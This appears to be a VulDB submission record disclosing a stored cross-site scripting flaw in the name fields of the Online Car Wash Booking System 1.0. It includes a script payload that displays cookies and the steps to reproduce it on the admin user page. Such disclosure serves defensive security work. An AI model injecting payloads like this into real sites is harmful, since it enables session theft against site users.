| Title | SourceCodester Online Car Wash Booking System 1.0 Cross Site Scripting |
|---|
| Description | # Exploit Title: Online Car Wash Booking System - Stored XSS
# Exploit Author: darkrai069
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
Description:-
A Stored Cross-Site Scripting (XSS) vulnerability in Online Car Wash Booking System allows injection of arbitrary JavaScript in Edit in "First Name" and "Last Name".
Payload used:-
<script>confirm (document.cookie)</script>
Parameters:-
First Name: <script>confirm (document.cookie)</script>
Last Name: <script>confirm (document.cookie)</script>
Steps to reproduce:-
1. Log in to your admin account
2. Now go to http://localhost:8080/ocwbs/admin/?page=user/list and add a new user
3. In the "First Name" and "Last Name" parameters, put the payload.
<script>confirm (document.cookie)</script>
4. As you can see our payload has been executed. |
|---|
| User | Anonymous User |
|---|
| Submission | 25.05.2024 15:19 (2 years ago) |
|---|
| Moderation | 25.05.2024 20:27 (5 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 266303 [oretnom23 Online Car Wash Booking System 1.0 /admin/?page=user/list First Name/Last Name Cross Site Scripting] |
|---|
| Points | 17 |
|---|